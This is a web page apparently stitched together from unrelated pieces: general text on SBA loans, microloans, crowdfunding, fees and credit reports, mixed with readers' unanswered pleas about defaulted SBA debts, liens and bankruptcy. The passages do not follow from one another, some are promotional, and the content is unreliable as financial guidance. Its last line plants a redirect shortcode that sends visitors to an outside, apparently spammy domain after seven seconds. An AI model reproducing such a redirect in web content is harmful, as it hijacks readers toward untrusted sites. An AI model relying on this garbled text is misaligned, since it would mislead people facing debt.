Crowdfunding has become a popular way for small businesses to raise money, thanks to such sites as Kickstarter and Indiegogo, which let you solicit funds through online campaigns. Instead of paying back your donors, you give them gifts, which is why this system is also called rewards crowdfunding.
We had a small business loan and the bank liened all our property, including personal home and rental house. We had to file Chapter 7 personally because of securing our business debt. We have been discharged for several years but the liens remain. The bank was repaid their 25% of the business loan by sale of our business property. The SBA guaranteed the 75%. Is there any possibility of getting the liens removed?
Do not stop at the FICO score. Examine your credit report closely. If you see an item that does not belong or may be outdated, file a request to have the item removed from your report. Inaccurate and outdated entries in credit reports are more common than most people realize.

Collateral: While the SBA will not refuse to guarantee a loan due to insufficient collateral, a lender is less likely to approve a loan that isn’t backed by sufficient collateral. Loans under $25K don’t need to be collateralized
“‘We the people’ are co-signing your small business loan,” explains Rafael Cruz, regional director for the Florida Small Business Development Center (SBDC) in Fort Lauderdale, one of hundreds of SBA-backed small business assistance centers located around the country. “It’s been one of the most effective business development plans in history. In reality, small business is one of the most risky things you can get into.”
Navigating these requirements and the accompanying paperwork can be difficult and is the main reason people think of SBA loans as slow and hard to get. Some of the best SBA lenders, like SmartBiz, have streamlined this process and drastically cut down paperwork and application times. In fact, SmartBiz routinely closes SBA loans in 2-3 weeks.
Because of unemployment, I defaulted on a SBA disaster loan for the contents of my home. The collection company has charged an outrageous administration fee. What can I do to reduce the administrative fee. Once I started working, I’ve been paying my loan every month for the past eight months, but they will not reduce the fee. Help?
In 2008 we defaulted on SBA loan, went through a foreclosure and our lawyer told us we were ‘all set’ and we through we were, this SUMMER we got a bill for $150,000. No contact in 7 years and the SBA all of a sudden sent us right on to the department of Treasury, no due process…. forced us into an emergency bankruptcy.
Loan Processing and Service fees: Over the lifetime of a loan, your lender will perform a variety of activities, such as customer service or billing, to manage and administrate the loan. A service or processing fee is used to cover the cost of these expenses. Service fees are frequently billed monthly or according to the loan repayment schedule, but some lenders may only charge a one-time service fee. Service fees are usually charged as a percentage of payment amount (if billed regularly) or of the total loan amount (if one- time).
Because you’re just starting out and your personal credit score is below 600, your best bet is microloans through nonprofit lenders or the Small Business Administration. The downside is that these are “micro” amounts of money, usually no more than $50,000. Many microlenders, however, help businesses grow and establish better credit. SBA microloans generally have APRs of 8% to 8.5% with manageable repayment terms. Successfully repaying microloans will boost your credit score and make you eligible for bigger financing.

A five-year $10,000 loan with a Prosper Rating of A would have an interest rate of 7.69% and a 5% origination fee for an APR of 9.88% APR. You would receive $9,500 and make 60 scheduled monthly payments of $201.28. Origination fees vary between 1%-5%. I received a disaster loan after hurricane Katrina. I had a small house that I was remodeling. My insurance cancelled because house was not livable. I became disabled after getting the loan and was forced to file for SS disability. With the decline in my income I missed a couple of payments and my loan was turned over to a collection agency. They deduct my payment out of my SS check before I get it. It doesn’t leave me enough to even rent an apt. Is there any way I can get this loan forgiven. Please help!

Microlenders and nonprofit lenders can be a less difficult route, especially if you have shaky finances. Many focus on minority or traditionally disadvantaged small-business owners, as well as small businesses in communities that are struggling economically.
The 7(a) Loan Guarantee Program is designed to help entrepreneurs start or expand their small businesses. The program makes capital available to small businesses through bank and non-bank lending institutions. The Small Business Jobs Act of 2010 increased the maximum size of these loans, indefinitely, from $2 million to $5 million.
To help the government fight the funding of terrorism and money laundering activities, Federal law requires all financial institutions to obtain, verify, and record information that identifies each person and business that seeks a business loan. What this means for you: When you apply for a loan, we will ask for your business name, address, and Tax Identification Number. We will also ask for your name, address, date of birth, and other information that will allow us to identify you. We may also ask to see your driver’s license or other identifying documents.
Applying for an SBA loan is like applying for a regular commercial loan — except this may be the last resort for your businesses because you have to have been turned down for a business loan on your own. It’s not as simple as walking into an SBA office and asking for a loan application. You need to do all the necessary homework and put together all the necessary paperwork that you would before approaching a commercial bank. That means you need to review your personal credit history and be prepared to discuss. You need to assemble the historical financial reports from your business. And you need to have a business plan.
• Your business also needs to meet lender qualifications. After determining that your business meets the SBA qualifications, you need to apply for a commercial loan — and the qualifications for that are often more arduous. “To secure an SBA loan, you must to submit a loan application a bank, credit union, or other financial company that processes SBA loans,” says Jim Anderson, a management counselor for Orange County SCORE, a nationwide non-profit small business mentoring and training association, and a former management consultant who spent time working for Honeywell and the Ford Motor Co. “You will not directly secure the loan from the SBA; the SBA makes loans available through participating vendors and provides a government guarantee to the lenders. The SBA has designated some lenders as ‘Preferred Lenders’ that can approve loan requests on behalf of the SBA, which may expedite the loan process.” [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]
